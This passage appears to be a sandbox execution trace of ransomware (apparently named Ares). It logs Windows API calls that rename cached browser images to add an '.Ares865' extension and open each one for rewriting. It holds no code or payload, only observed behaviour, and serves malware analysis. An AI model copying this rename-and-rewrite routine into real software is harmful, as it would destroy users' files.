files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png.ares865"), dwFlags=0x1) returned 1 [0095.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.905] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139243) returned 1 [0095.915] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg.Ares865") returned 117 [0095.916] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4857) returned 1 [0095.920] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg.Ares865") returned 117 [0095.920] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.922] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2473) returned 1 [0095.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg.Ares865") returned 117 [0095.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.925] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6920) returned 1 [0095.928] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg.Ares865") returned 117 [0095.928] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVGyR[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvgyr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.930] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7233) returned 1 [0095.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg.Ares865") returned 117 [0095.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2384) returned 1 [0095.937] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg.Ares865") returned 117 [0095.937] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7098) returned 1 [0095.943] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg.Ares865") returned 117 [0095.943] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBWLtW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbwltw[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1898) returned 1 [0095.949] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg.Ares865") returned 117 [0095.949] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBX3xB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbx3xb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.950] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2399) returned 1 [0095.954] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg.Ares865") returned 117 [0095.954] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBY98e[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbby98e[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.955] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9246) returned 1 [0095.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg.Ares865") returned 117 [0095.961] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBZYVP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbzyvp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2360) returned 1 [0095.965] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg.Ares865") returned 117 [0095.965] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04o2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04o2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.967] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6442) returned 1 [0095.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg.Ares865") returned 117 [0095.971] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04ok[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04ok[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.972] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9211) returned 1 [0095.976] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg.Ares865") returned 117 [0095.976] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC04we[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc04we[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.977] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10905) returned 1 [0095.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg.Ares865") returned 117 [0095.981] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.982] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.982] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12800) returned 1 [0095.987] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg.Ares865") returned 117 [0095.987] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg.ares865"), dwFlags=0x1) returned 1 [0095.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC05rl[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc05rl[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.989] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2017) returned 1 [0095.993] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg.Ares865") returned 117 [0095.993] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0ATj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0atj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6990) returned 1 [0096.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg.Ares865") returned 117 [0096.002] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0D8i[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0d8i[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1873) returned 1 [0096.008] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 